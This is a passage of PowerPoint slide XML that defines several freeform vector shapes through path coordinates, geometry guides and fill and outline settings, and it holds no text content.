                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="50"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36076" name="Freeform 209"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3061" y="2068"/>
                <a:ext cx="149" cy="104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 149"/>
                  <a:gd name="T1" fmla="*/ 50 h 104"/>
                  <a:gd name="T2" fmla="*/ 9 w 149"/>
                  <a:gd name="T3" fmla="*/ 49 h 104"/>
                  <a:gd name="T4" fmla="*/ 17 w 149"/>
                  <a:gd name="T5" fmla="*/ 41 h 104"/>
                  <a:gd name="T6" fmla="*/ 28 w 149"/>
                  <a:gd name="T7" fmla="*/ 17 h 104"/>
                  <a:gd name="T8" fmla="*/ 40 w 149"/>
                  <a:gd name="T9" fmla="*/ 10 h 104"/>
                  <a:gd name="T10" fmla="*/ 45 w 149"/>
                  <a:gd name="T11" fmla="*/ 6 h 104"/>
                  <a:gd name="T12" fmla="*/ 52 w 149"/>
                  <a:gd name="T13" fmla="*/ 6 h 104"/>
                  <a:gd name="T14" fmla="*/ 67 w 149"/>
                  <a:gd name="T15" fmla="*/ 8 h 104"/>
                  <a:gd name="T16" fmla="*/ 69 w 149"/>
                  <a:gd name="T17" fmla="*/ 10 h 104"/>
                  <a:gd name="T18" fmla="*/ 73 w 149"/>
                  <a:gd name="T19" fmla="*/ 13 h 104"/>
                  <a:gd name="T20" fmla="*/ 77 w 149"/>
                  <a:gd name="T21" fmla="*/ 11 h 104"/>
                  <a:gd name="T22" fmla="*/ 93 w 149"/>
                  <a:gd name="T23" fmla="*/ 7 h 104"/>
                  <a:gd name="T24" fmla="*/ 96 w 149"/>
                  <a:gd name="T25" fmla="*/ 1 h 104"/>
                  <a:gd name="T26" fmla="*/ 102 w 149"/>
                  <a:gd name="T27" fmla="*/ 0 h 104"/>
                  <a:gd name="T28" fmla="*/ 112 w 149"/>
                  <a:gd name="T29" fmla="*/ 15 h 104"/>
                  <a:gd name="T30" fmla="*/ 124 w 149"/>
                  <a:gd name="T31" fmla="*/ 29 h 104"/>
                  <a:gd name="T32" fmla="*/ 126 w 149"/>
                  <a:gd name="T33" fmla="*/ 43 h 104"/>
                  <a:gd name="T34" fmla="*/ 124 w 149"/>
                  <a:gd name="T35" fmla="*/ 58 h 104"/>
                  <a:gd name="T36" fmla="*/ 123 w 149"/>
                  <a:gd name="T37" fmla="*/ 62 h 104"/>
                  <a:gd name="T38" fmla="*/ 125 w 149"/>
                  <a:gd name="T39" fmla="*/ 65 h 104"/>
                  <a:gd name="T40" fmla="*/ 127 w 149"/>
                  <a:gd name="T41" fmla="*/ 65 h 104"/>
                  <a:gd name="T42" fmla="*/ 130 w 149"/>
                  <a:gd name="T43" fmla="*/ 69 h 104"/>
                  <a:gd name="T44" fmla="*/ 135 w 149"/>
                  <a:gd name="T45" fmla="*/ 68 h 104"/>
                  <a:gd name="T46" fmla="*/ 143 w 149"/>
                  <a:gd name="T47" fmla="*/ 65 h 104"/>
                  <a:gd name="T48" fmla="*/ 149 w 149"/>
                  <a:gd name="T49" fmla="*/ 67 h 104"/>
                  <a:gd name="T50" fmla="*/ 147 w 149"/>
                  <a:gd name="T51" fmla="*/ 74 h 104"/>
                  <a:gd name="T52" fmla="*/ 142 w 149"/>
                  <a:gd name="T53" fmla="*/ 78 h 104"/>
                  <a:gd name="T54" fmla="*/ 137 w 149"/>
                  <a:gd name="T55" fmla="*/ 81 h 104"/>
                  <a:gd name="T56" fmla="*/ 131 w 149"/>
                  <a:gd name="T57" fmla="*/ 94 h 104"/>
                  <a:gd name="T58" fmla="*/ 130 w 149"/>
                  <a:gd name="T59" fmla="*/ 104 h 104"/>
                  <a:gd name="T60" fmla="*/ 116 w 149"/>
                  <a:gd name="T61" fmla="*/ 99 h 104"/>
                  <a:gd name="T62" fmla="*/ 110 w 149"/>
                  <a:gd name="T63" fmla="*/ 96 h 104"/>
                  <a:gd name="T64" fmla="*/ 101 w 149"/>
                  <a:gd name="T65" fmla="*/ 92 h 104"/>
                  <a:gd name="T66" fmla="*/ 83 w 149"/>
                  <a:gd name="T67" fmla="*/ 102 h 104"/>
                  <a:gd name="T68" fmla="*/ 71 w 149"/>
                  <a:gd name="T69" fmla="*/ 99 h 104"/>
                  <a:gd name="T70" fmla="*/ 64 w 149"/>
                  <a:gd name="T71" fmla="*/ 102 h 104"/>
                  <a:gd name="T72" fmla="*/ 53 w 149"/>
                  <a:gd name="T73" fmla="*/ 98 h 104"/>
                  <a:gd name="T74" fmla="*/ 44 w 149"/>
                  <a:gd name="T75" fmla="*/ 100 h 104"/>
                  <a:gd name="T76" fmla="*/ 42 w 149"/>
                  <a:gd name="T77" fmla="*/ 98 h 104"/>
                  <a:gd name="T78" fmla="*/ 41 w 149"/>
                  <a:gd name="T79" fmla="*/ 94 h 104"/>
                  <a:gd name="T80" fmla="*/ 35 w 149"/>
                  <a:gd name="T81" fmla="*/ 90 h 104"/>
                  <a:gd name="T82" fmla="*/ 37 w 149"/>
                  <a:gd name="T83" fmla="*/ 85 h 104"/>
                  <a:gd name="T84" fmla="*/ 38 w 149"/>
                  <a:gd name="T85" fmla="*/ 84 h 104"/>
                  <a:gd name="T86" fmla="*/ 32 w 149"/>
                  <a:gd name="T87" fmla="*/ 83 h 104"/>
                  <a:gd name="T88" fmla="*/ 29 w 149"/>
                  <a:gd name="T89" fmla="*/ 87 h 104"/>
                  <a:gd name="T90" fmla="*/ 25 w 149"/>
                  <a:gd name="T91" fmla="*/ 83 h 104"/>
                  <a:gd name="T92" fmla="*/ 21 w 149"/>
                  <a:gd name="T93" fmla="*/ 80 h 104"/>
                  <a:gd name="T94" fmla="*/ 17 w 149"/>
                  <a:gd name="T95" fmla="*/ 80 h 104"/>
                  <a:gd name="T96" fmla="*/ 18 w 149"/>
                  <a:gd name="T97" fmla="*/ 77 h 104"/>
                  <a:gd name="T98" fmla="*/ 18 w 149"/>
                  <a:gd name="T99" fmla="*/ 76 h 104"/>
                  <a:gd name="T100" fmla="*/ 18 w 149"/>
                  <a:gd name="T101" fmla="*/ 74 h 104"/>
                  <a:gd name="T102" fmla="*/ 19 w 149"/>
                  <a:gd name="T103" fmla="*/ 71 h 104"/>
                  <a:gd name="T104" fmla="*/ 12 w 149"/>
                  <a:gd name="T105" fmla="*/ 68 h 104"/>
                  <a:gd name="T106" fmla="*/ 8 w 149"/>
                  <a:gd name="T107" fmla="*/ 63 h 104"/>
                  <a:gd name="T108" fmla="*/ 7 w 149"/>
                  <a:gd name="T109" fmla="*/ 58 h 104"/>
                  <a:gd name="T110" fmla="*/ 5 w 149"/>
                  <a:gd name="T111" fmla="*/ 55 h 104"/>
                  <a:gd name="T112" fmla="*/ 0 w 149"/>
                  <a:gd name="T113" fmla="*/ 50 h 104"/>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49"/>
                  <a:gd name="T172" fmla="*/ 0 h 104"/>
                  <a:gd name="T173" fmla="*/ 149 w 149"/>
                  <a:gd name="T174" fmla="*/ 104 h 104"/>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49" h="104">
                    <a:moveTo>
                      <a:pt x="0" y="50"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="50"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36077" name="Freeform 210"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2858" y="2306"/>
                <a:ext cx="63" cy="135"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 89 h 135"/>
                  <a:gd name="T2" fmla="*/ 62 w 63"/>
                  <a:gd name="T3" fmla="*/ 96 h 135"/>
                  <a:gd name="T4" fmla="*/ 52 w 63"/>
                  <a:gd name="T5" fmla="*/ 102 h 135"/>
                  <a:gd name="T6" fmla="*/ 41 w 63"/>
                  <a:gd name="T7" fmla="*/ 115 h 135"/>
                  <a:gd name="T8" fmla="*/ 42 w 63"/>
                  <a:gd name="T9" fmla="*/ 127 h 135"/>
                  <a:gd name="T10" fmla="*/ 34 w 63"/>
                  <a:gd name="T11" fmla="*/ 134 h 135"/>
                  <a:gd name="T12" fmla="*/ 29 w 63"/>
                  <a:gd name="T13" fmla="*/ 123 h 135"/>
                  <a:gd name="T14" fmla="*/ 22 w 63"/>
                  <a:gd name="T15" fmla="*/ 100 h 135"/>
                  <a:gd name="T16" fmla="*/ 16 w 63"/>
                  <a:gd name="T17" fmla="*/ 96 h 135"/>
                  <a:gd name="T18" fmla="*/ 11 w 63"/>
                  <a:gd name="T19" fmla="*/ 85 h 135"/>
                  <a:gd name="T20" fmla="*/ 5 w 63"/>
                  <a:gd name="T21" fmla="*/ 82 h 135"/>
                  <a:gd name="T22" fmla="*/ 0 w 63"/>
                  <a:gd name="T23" fmla="*/ 68 h 135"/>
                  <a:gd name="T24" fmla="*/ 8 w 63"/>
                  <a:gd name="T25" fmla="*/ 56 h 135"/>
                  <a:gd name="T26" fmla="*/ 13 w 63"/>
                  <a:gd name="T27" fmla="*/ 50 h 135"/>
                  <a:gd name="T28" fmla="*/ 12 w 63"/>
                  <a:gd name="T29" fmla="*/ 40 h 135"/>
                  <a:gd name="T30" fmla="*/ 12 w 63"/>
                  <a:gd name="T31" fmla="*/ 19 h 135"/>
                  <a:gd name="T32" fmla="*/ 18 w 63"/>
                  <a:gd name="T33" fmla="*/ 10 h 135"/>
                  <a:gd name="T34" fmla="*/ 22 w 63"/>
                  <a:gd name="T35" fmla="*/ 7 h 135"/>
                  <a:gd name="T36" fmla="*/ 30 w 63"/>
                  <a:gd name="T37" fmla="*/ 1 h 135"/>
                  <a:gd name="T38" fmla="*/ 40 w 63"/>
                  <a:gd name="T39" fmla="*/ 2 h 135"/>
                  <a:gd name="T40" fmla="*/ 42 w 63"/>
                  <a:gd name="T41" fmla="*/ 6 h 135"/>
                  <a:gd name="T42" fmla="*/ 46 w 63"/>
                  <a:gd name="T43" fmla="*/ 12 h 135"/>
                  <a:gd name="T44" fmla="*/ 53 w 63"/>
                  <a:gd name="T45" fmla="*/ 6 h 135"/>
                  <a:gd name="T46" fmla="*/ 56 w 63"/>
                  <a:gd name="T47" fmla="*/ 8 h 135"/>
                  <a:gd name="T48" fmla="*/ 50 w 63"/>
                  <a:gd name="T49" fmla="*/ 17 h 135"/>
                  <a:gd name="T50" fmla="*/ 48 w 63"/>
                  <a:gd name="T51" fmla="*/ 24 h 135"/>
                  <a:gd name="T52" fmla="*/ 53 w 63"/>
                  <a:gd name="T53" fmla="*/ 32 h 135"/>
                  <a:gd name="T54" fmla="*/ 58 w 63"/>
                  <a:gd name="T55" fmla="*/ 41 h 135"/>
                  <a:gd name="T56" fmla="*/ 53 w 63"/>
                  <a:gd name="T57" fmla="*/ 49 h 135"/>
                  <a:gd name="T58" fmla="*/ 41 w 63"/>
                  <a:gd name="T59" fmla="*/ 60 h 135"/>
                  <a:gd name="T60" fmla="*/ 42 w 63"/>
                  <a:gd name="T61" fmla="*/ 67 h 135"/>
                  <a:gd name="T62" fmla="*/ 50 w 63"/>
                  <a:gd name="T63" fmla="*/ 74 h 135"/>
                  <a:gd name="T64" fmla="*/ 55 w 63"/>
                  <a:gd name="T65" fmla="*/ 73 h 135"/>
                  <a:gd name="T66" fmla="*/ 59 w 63"/>
                  <a:gd name="T67" fmla="*/ 79 h 135"/>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63"/>
                  <a:gd name="T103" fmla="*/ 0 h 135"/>
                  <a:gd name="T104" fmla="*/ 63 w 63"/>
                  <a:gd name="T105" fmla="*/ 135 h 135"/>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63" h="135">
                    <a:moveTo>
                      <a:pt x="63" y="81"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="63" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="81"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36078" name="Freeform 211"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2858" y="2306"/>
                <a:ext cx="63" cy="135"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 89 h 135"/>
                  <a:gd name="T2" fmla="*/ 62 w 63"/>
                  <a:gd name="T3" fmla="*/ 96 h 135"/>
                  <a:gd name="T4" fmla="*/ 52 w 63"/>
                  <a:gd name="T5" fmla="*/ 102 h 135"/>
                  <a:gd name="T6" fmla="*/ 41 w 63"/>
                  <a:gd name="T7" fmla="*/ 115 h 135"/>
                  <a:gd name="T8" fmla="*/ 42 w 63"/>
                  <a:gd name="T9" fmla="*/ 127 h 135"/>
                  <a:gd name="T10" fmla="*/ 34 w 63"/>
                  <a:gd name="T11" fmla="*/ 134 h 135"/>
                  <a:gd name="T12" fmla="*/ 29 w 63"/>
                  <a:gd name="T13" fmla="*/ 123 h 135"/>
                  <a:gd name="T14" fmla="*/ 22 w 63"/>
                  <a:gd name="T15" fmla="*/ 100 h 135"/>
                  <a:gd name="T16" fmla="*/ 16 w 63"/>
